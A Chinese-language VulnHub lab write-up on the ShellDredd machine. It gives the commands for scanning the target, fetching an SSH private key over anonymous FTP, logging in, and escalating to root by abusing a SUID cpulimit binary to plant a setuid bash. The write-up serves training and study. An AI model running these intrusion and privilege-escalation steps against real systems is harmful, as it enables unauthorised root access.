vulnhub之ShellDredd的实践

admin 2022年12月19日11:08:58评论39 views字数 769阅读2分33秒阅读模式

今天实践的是vulnhub的ShellDredd镜像,

下载地址,https://download.vulnhub.com/onsystem/ShellDredd-1-Hannah.ova,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.1.0/24,这回有地址了,108就是,

vulnhub之ShellDredd的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.108,

vulnhub之ShellDredd的实践

有可匿名登录的ftp服务,登录,

ftp 192.168.1.108
Anonymous

获取到ssh登录的私钥,

ls -la
cd .hannah
ls -la
get id_rsa

修改权限,chmod 600 id_rsa,

ssh登录,ssh -i id_rsa [email protected] -p 61000,

id确认不是root,需要提权,

vulnhub之ShellDredd的实践

寻找root权限的程序,find / -perm -u=s -type f 2>/dev/null,

vulnhub之ShellDredd的实践

/usr/bin/cpulimit可被利用,

cd /tmp
cpulimit -l 100 -f mkdir /ignite
cpulimit -l 100 -f chmod 4755 /usr/bin/bash
cpulimit -l 100 -f cp /usr/bin/bash /ignite
cpulimit -l 100 -f chmod +s /ignite/bash
cd /ignite
./bash -p

id确认是root,

vulnhub之ShellDredd的实践

本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束。

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之ShellDredd的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月19日11:08:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之ShellDredd的实践https://cn-sec.com/archives/1471488.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息